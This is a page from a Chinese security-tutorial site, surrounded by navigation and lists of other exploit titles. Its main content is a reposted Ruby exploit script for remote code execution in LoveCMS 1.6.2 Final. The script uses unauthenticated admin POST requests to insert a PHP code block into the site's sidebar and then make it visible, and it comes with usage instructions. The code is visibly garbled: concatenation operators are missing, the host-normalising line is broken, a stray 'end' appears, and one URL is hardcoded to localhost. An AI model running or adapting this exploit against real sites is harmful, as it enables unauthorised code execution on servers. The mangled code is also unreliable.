• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > LoveCMS 1.6.2 Final Remote Code Execution Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了LoveCMS 1.6.2 Final Remote Code Execution Exploit ,其中包含execution,execution是什么意思,max execution time,execution aborted,execution翻译等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 1: adding a side block
##
## Description: add some php into a block container
## on the side of the site. phpinfo() is called.
##
## Usage: ./LoveCMS_1_blocks.rb <host>
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
# require 'net/http'
require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host
# --
puts " LoveCMS Exploit Series. #1: Adding side blocks."
puts
puts " : Attacking host: " @host # --
# Insert a new block
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),
{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})
puts " :: Block inserted." # --
# Build post variable for next step
post_vars = {'submit' => 1}
(1..50).each do |id|
post_vars['position' id.to_s] = 1
post_vars['height' id.to_s] = 1
post_vars['visible' id.to_s] = 1
end
# Make the block visible
res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )
puts " :: Blocks displayed." # --
puts
puts " - Visit " @host
end
</div>

您可能想查找下面的文章:

  • IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
  • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
  • fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
  • fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
  • fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
  • minb 0.1.0 Remote Code Execution Exploit
  • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit

相关文章

  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
  • Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
  • TGS CMS 0.3.2r2 Remote Code Execution Exploit
  • DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
  • Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
  • MS Internet Explorer (FTP Server Response) DoS Exploit
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
  • Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
  • Rianxosencabos CMS 0.9 Remote Add Admin Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
    • PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit
    • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
    • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
    • CJ Ultra Plus
    • TGS CMS 0.3.2r2 Remote Code Execution Exploit
    • MS Windows (MessageBox) Memory Corruption Local Denial of Service
    • Maian Events 2.0 Insecure Cookie Handling Vulnerability
    • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
    • Joomla Component n-forms 1.01 Blind SQL Injection Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有